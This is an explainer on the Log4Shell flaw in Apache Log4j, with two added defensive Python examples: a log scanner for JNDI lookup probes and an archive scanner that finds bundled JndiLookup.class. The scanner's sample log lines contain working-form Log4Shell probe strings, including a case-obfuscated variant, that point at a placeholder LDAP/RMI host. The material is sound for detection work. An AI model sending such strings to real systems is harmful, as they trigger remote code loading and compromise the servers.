Why is Log4Shell so bad?
Apache Log4j is an open-source logging library used in millions of Java projects, including a substantial share of enterprise applications and cloud services. More than 1,800 major GitHub repositories depend on the Log4j logging library.
Log4j is used to log all sorts of data about how applications are being used, format it, and push it to various destinations. But Log4j is not just a passive logging tool: it actively interprets the data that is being logged.
The Log4Shell exploit takes advantage of that feature. An attacker gets a specially crafted JNDI lookup string into data that Log4j will log; Log4j interprets the string and uses JNDI to make a request to the attacker's site, and the payload returned by that request is then executed.
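Because the vulnerable behaviour is triggered by a string that merely passes through a log statement, the most immediate detection is to look for the JNDI lookup prefix in anything an application logged (web access logs, user-agent and header fields, form input). The following is an added example, not code from the original article: a small Python detector run over constructed sample access-log lines (the host names are placeholders). It folds Log4j's documented `${lower:...}` and `${upper:...}` lookups before matching, since those can wrap the prefix and a naive substring search would miss it.

```python
import re

# Constructed sample access-log lines (not real traffic); hosts are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://placeholder.example/b}"',
    '10.0.0.3 - - [10/Dec/2021:10:02:00 +0000] "GET /search?q=log4j HTTP/1.1" 200 900 "-" "curl/7.79"',
]

# Log4j resolves ${lower:x} / ${upper:x} to plain text before the outer lookup
# runs, so a detector must fold them the same way to see the real prefix.
NESTED_CASE_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse lower/upper lookup wrappers repeatedly; they can be nested."""
    for _ in range(max_rounds):
        folded = NESTED_CASE_LOOKUP.sub(lambda m: m.group(2), text)
        if folded == text:
            break
        text = folded
    return text


def contains_jndi_lookup(line: str) -> bool:
    """True if the line carries a JNDI lookup prefix after normalization."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def find_suspicious(lines):
    """Return the indexes of lines that should be triaged as Log4Shell probes."""
    return [i for i, line in enumerate(lines) if contains_jndi_lookup(line)]


if __name__ == "__main__":
    for idx in find_suspicious(SAMPLE_LOG_LINES):
        print(f"line {idx}: possible JNDI lookup string: {SAMPLE_LOG_LINES[idx]}")
```

A hit in such a scan means a probe reached the application, not that it succeeded; the useful follow-up is to check whether the host made an outbound LDAP or RMI connection around the same timestamp, which is what a successful lookup would produce.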
Using this exploit requires very little technical expertise. It was initially discovered in the game Minecraft, where users were issuing commands simply by typing the JNDI string into a chat box. Security researchers have also shown that commands can be issued from devices such as iPhones and Tesla vehicles simply by changing the device's name to the string.
Hopefully by now, many companies have taken action to protect their most critical applications and assets by updating their Log4j libraries and applying mitigations. However, the extremely widespread use of Log4j can make it very difficult to hunt down all of its uses within an enterprise. Any server or application that is not actively being maintained is at risk of being exploited by attackers. And those who have already been exploited may have to handle future attacks that build on the fingerprinting attackers performed or the persistence mechanisms they left behind. This exploit will likely haunt security teams for years to come.
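Hunting down every copy of Log4j is harder than checking a dependency manifest, because log4j-core is routinely bundled inside application archives (Spring Boot fat jars, WAR and EAR files) that a package inventory never sees. The following is an added example, not code from the original article: a Python scanner that walks a directory tree, opens every jar/war/ear, recurses into nested archives, and reports any archive that still contains `org/apache/logging/log4j/core/lookup/JndiLookup.class`, the class that implements the vulnerable lookup. The fixture it scans is constructed in memory, with placeholder bytes standing in for real class files.

```python
import io
import zipfile
from pathlib import Path

# The class that performs the JNDI lookup; its presence marks a jar worth triaging.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def scan_archive(data: bytes, name: str, depth: int = 0, max_depth: int = 5):
    """Return (archive_path, finding) pairs for this archive and any nested archives."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container; nothing to inspect
    with zf:
        names = zf.namelist()
        if JNDI_LOOKUP_CLASS in names:
            findings.append((name, "contains JndiLookup.class"))
        if depth < max_depth:  # bounded recursion guards against archive bombs
            for member in names:
                if member.lower().endswith(ARCHIVE_SUFFIXES):
                    nested = zf.read(member)
                    findings.extend(scan_archive(nested, f"{name}!{member}", depth + 1, max_depth))
    return findings


def scan_tree(root) -> list:
    """Scan every archive file under root on disk."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            findings.extend(scan_archive(path.read_bytes(), str(path)))
    return findings


def build_sample_fat_jar() -> bytes:
    """Constructed fixture: an app jar bundling a fake log4j-core jar (placeholder bytes, not real classes)."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
        z.writestr("BOOT-INF/lib/log4j-core-PLACEHOLDER.jar", inner.getvalue())
    return outer.getvalue()


def build_clean_jar() -> bytes:
    """Constructed fixture: an archive with no Log4j content at all."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("com/example/Other.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for archive, finding in scan_archive(build_sample_fat_jar(), "app.jar"):
        print(f"{archive}: {finding}")
    # For a real host: for archive, finding in scan_tree("/opt"): ...
```

Reporting on the class rather than on the file name catches renamed or shaded copies of log4j-core, and a jar from which the class has been removed (the mitigation Apache published for deployments that could not upgrade immediately) correctly produces no finding. Version checks belong in a second pass over `META-INF/maven/.../pom.properties`, since the class is still present in patched releases where the lookup is disabled.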